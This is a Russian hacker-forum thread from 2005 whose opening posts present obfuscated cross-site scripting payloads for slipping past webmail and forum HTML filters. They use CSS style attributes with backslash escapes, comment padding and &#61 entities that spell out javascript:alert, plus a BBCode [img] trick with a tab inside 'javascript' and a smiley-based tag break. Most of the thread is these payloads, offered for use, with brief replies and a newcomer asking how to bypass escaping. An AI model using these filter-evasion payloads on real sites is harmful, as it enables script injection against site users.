Авторские статьи Новый обход фильтров форумов и и-мейлов используя атрибут style

Обсуждение в разделе «Статьи», начал(-а) Dyb, 1.12.2005.

  1. Dyb

    Dyb Banned

    Регистрация:
    29.11.2005
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0
    Эти структуры, проверял, работают на ВСЕХ и-мейлах как и на Русских, так и на Английских. Все что нужно, так это разрушить структуру тегов, что не смешите меня, для меня и для знающих, пустяки. На форуме труднее ломать структуру, чем на и-мейлах.


    HTML:
    <html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\(\'\w\j\'\)\)" >wj<a></body></html>
    HTML:
    <html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html>

    HTML:
    <html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html>
    without single (') quotes.


    HTML:
    <html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
    without single (') or double (") quotes.


    HTML:
    <html><body><a href=www. style=&#61&#61&#61/&#61*&#61*&#61/&#61back\g\r\o\u\nd&#61/&#61*&#61*&#61/&#61:&#61/*&#61*/\u/*&#61*/\r/*&#61*/l/*&#61*/\(/*&#61*/\j/*&#61*/a/*&#61*/v/*&#61*/a/*&#61*/s/*&#61*/c/*&#61*/\r/*&#61*/\i\p/*&#61*/\t\:/*&#61*/a/*&#61*/\l/*&#61*/e/*&#61*/\r/*&#61*/\t/*&#61*/\(/*&#61*&#61/&#61\&#61/&#61*&#61*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
    With equals sign. (=) (&#61)


    HTML:
    <html><body><a href=www. style=&#61&#61&#61/&#61*&#61*&#61/&#61back\g\r\o\u\nd&#61/&#61*&#61*&#61/&#61:&#61/*&#61*/\u/*&#61*/\r/*&#61*/l/*&#61*/\(/*&#61*/\j/*&#61*/a/*&#61*/v/*&#61*/a/*&#61*/s/*&#61*/c/*&#61*/\r/*&#61*/\i\p/*&#61*/\t\:/*&#61*/a/*&#61*/\l/*&#61*/e/*&#61*/\r/*&#61*/\t/*&#61*/\(/*&#61*&#61/&#61\&#61/&#61*&#61*/'\w\j\'/*&#61*&#61/&#61\&#61/&#61*&#61*/)/*&#61*&#61/&#61\&#61/&#61*&#61*/) >wj<a></body></html>
    With equals sign and single quotes. (=) (&#61) (')


    HTML:
    <html><body><a href=www. style=&#61&#61&#61/&#61*&#61*&#61/&#61back\g\r\o\u\nd&#61/&#61*&#61*&#61/&#61:&#61/*&#61*/\u/*&#61*/\r/*&#61*/l/*&#61*/\(/*&#61*/\j/*&#61*/a/*&#61*/v/*&#61*/a/*&#61*/s/*&#61*/c/*&#61*/\r/*&#61*/\i\p/*&#61*/\t\:/*&#61*/a/*&#61*/\l/*&#61*/e/*&#61*/\r/*&#61*/\t/*&#61*/\(/*&#61*&#61/&#61\&#61/&#61*&#61*&#61/&#61'&#61\&#61w&#61\&#61j&#61\&#61'&#61/&#61*&#61*&#61/&#61\&#61/&#61*&#61*/)/*&#61*&#61/&#61\&#61&#61/&#61*&#61*/) >wj<a></body></html>
    With equals sign and single quotes, but text inside the alert box, omitted. (=) (&#61) (')



    Просто интересно, что случается в этой комбинации для знающих. Легче всего просматривать в Фаерфоксе.

    HTML:
    <html><img src="blah.gif" <onchange="alert('you cli=cked me')"></body></html>
    и

    HTML:
    <html><img src="blah.gif" <onchange="alert('you clicked me')"></body></html>




    Вообщем не один фильтр, эти комбинации не палит, и можете это все проверить на locahost.


    Все это проверялось, и все это вы можете проверить и сами, открыв блокнот, copy/paste одну из комбинаций моих кодов как и есть, и сохранить как filename.html

    Работает только в браузере ИЕ.

    :rolleyes:








    А вот и моя коронка......


    HTML:
    <html><img src="blah.gif" <span style=&#61&#61&#61/&#61*&#61*&#61/&#61back\g\r\o\u\nd&#61/&#61*&#61*&#61/&#61:&#61/*&#61*/\u/*&#61*/\r/*&#61*/l/*&#61*/\(/*&#61*/\j/*&#61*/a/*&#61*/v/*&#61*/a/*&#61*/s/*&#61*/c/*&#61*/\r/*&#61*/\i\p/*&#61*/\t\:/*&#61*/a/*&#61*/\l/*&#61*/e/*&#61*/\r/*&#61*/\t/*&#61*/\(/*&#61*&#61/&#61\&#61/&#61*&#61*/'\w\j\'/*&#61*&#61/&#61\&#61/&#61*&#61*/)/*&#61*&#61/&#61\&#61/&#61*&#61*/) me')"
    <img src="blah.gif" <onchange="alert('you cli=cked me')">></body></html>
     
    #1 Dyb, 1.12.2005
    В последний раз редактировалось модератором: 1.12.2005
  2. africanec

    africanec Banned

    Регистрация:
    11.09.2005
    Сообщения:
    232
    Одобрения:
    14
    Репутация:
    9
    wj есть то что в чем ты еще нечего ненашол ну или неписал просто ето FUDforum новый естественно
    -----------------------------------------------------
    з.ы. еще пару статей и будет готов твои психологический портрет!-)
     
  3. Dyb

    Dyb Banned

    Регистрация:
    29.11.2005
    Сообщения:
    9
    Одобрения:
    0
    Репутация:
    0

    Ладно, ты прав...так уж и быть имхо.

    Должен сказать, что проверив почти все комбинации тегов, Я нашёл, что они ОЧЕНЬ сильно защищены имхо....ни в одном теги не проходит другой тег, и ни во едином теги не проходит двойная кавычка.

    Но вот в чём фишка....во ВСЕХ тегах, проходит смайлик....



    Что ну и что? А то, что вы сами теперь можете создавать свой смайлик и ломать через него...это типа, для выкрутасывания... +)

    Ну а вот и сам код алёрта,


    HTML:
    [img]java	script:alert().gif[/img]

    В теге, использована табуляция....как её создать? Открываем блокнот, и жмём кнопочку

    Через код который Я вам дал, можно создать свой смайлик и ломать через него....хотя Я пока сам не пробовал, так как это просто идея такая пришла когда засыпал и нужды толком так и не было к этому методу прибегать.

    И ещё, во всех тегах проходят одинарная кавычка, ('), и апостроф (`), так что создать свой смаилик и через него ломать через любой тег, проблем существовать не должно.

    Не забудьте, что смайлик работать не будет, если до смайлика и после, не будет стоять точка. (.)

    Пример,

    HTML:
    [img]http://www.wj.8).gif[/img]
    Результат,

    HTML:
    <img src="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif" border=0 alt="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif">



    Код тестился на форуме разработчиков форума, в версии ИЕ6. :rolleyes:
     
    #3 Dyb, 1.12.2005
    В последний раз редактировалось модератором: 1.12.2005
  4. africanec

    africanec Banned

    Регистрация:
    11.09.2005
    Сообщения:
    232
    Одобрения:
    14
    Репутация:
    9
    не я чото помню часика 2 тоже сморел чото вышло кривое непомню уже теперь на старой версии
    ну со смайликами чото уж сильно замученно
    --з.ы.--
    зато я знаю где ты ненайдешь нечего
    такой вот супер пупер мега куль форум-)
     
  5. Антошка2003

    Антошка2003 Elder - Старейшина

    Регистрация:
    3.04.2005
    Сообщения:
    555
    Одобрения:
    66
    Репутация:
    32
    а ты токв форумах уязвимости ищешь чтоли?
     
  6. link.

    link. Elder - Старейшина

    Регистрация:
    15.05.2005
    Сообщения:
    51
    Одобрения:
    3
    Репутация:
    1
  7. SanyaX

    SanyaX .::Club Life::.

    Регистрация:
    28.01.2005
    Сообщения:
    990
    Одобрения:
    392
    Репутация:
    167
    wj молодец за видео мне понравилось зилиные мибиры как всегда не одобрят забанят тебя скоро!
     
  8. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Регистрация:
    16.03.2005
    Сообщения:
    280
    Одобрения:
    75
    Репутация:
    58
    Джоран, респект! Довольно интересные наработки, осталось тока проверить.
     
  9. Otaku

    Otaku Elder - Старейшина

    Регистрация:
    24.07.2005
    Сообщения:
    280
    Одобрения:
    73
    Репутация:
    4
    Полезный человек этот Джордан.
    Хоть и вредный... :cool:
     
  10. Stream[kz]

    Stream[kz] New Member

    Регистрация:
    11.11.2007
    Сообщения:
    3
    Одобрения:
    0
    Репутация:
    0
    парни такая проблема вот ввожу я
    HTML:
    <script>alert()</script>
    в хтмл пишет
    HTML:
    &lt;script&gt;alert()&lt;/script&gt;
    значит он фильтрует > и добавляет после них ; как мне это обойти помогите плиз незнаю куда обратится просто .
     
  11. ~EviL~

    ~EviL~ Elder - Старейшина

    Регистрация:
    14.08.2007
    Сообщения:
    169
    Одобрения:
    77
    Репутация:
    3
    Ну ты и чайник... 1) Не туда запостил, это раздел СТАТЬИ. 2) &lt; и &gt; - это спец. символы, о которых ты явно не слышал... =\
     
  12. Stream[kz]

    Stream[kz] New Member

    Регистрация:
    11.11.2007
    Сообщения:
    3
    Одобрения:
    0
    Репутация:
    0
    А я и неговорил что умный темболее что &lt как я понел это < и &gt это > вот и спросил что нужно добавить чтоб не фильтровал =\
     
  13. ground_zero

    ground_zero Elder - Старейшина

    Регистрация:
    11.10.2006
    Сообщения:
    398
    Одобрения:
    85
    Репутация:
    10
    а реально перенести мтатью в раздел юиора болталка например ? я кислоты скушаю тоже поделюсь своими наблюдениями
     
  14. SladerNon

    SladerNon Круче только горы

    Регистрация:
    6.03.2005
    Сообщения:
    1 625
    Одобрения:
    265
    Репутация:
    216
    Заметка то по сути гениальная! :). Особенно для 2005 года. :)

    p.s. С ностальгией:
    Джордан, джордан... куда же ты пропал!
     
Загрузка...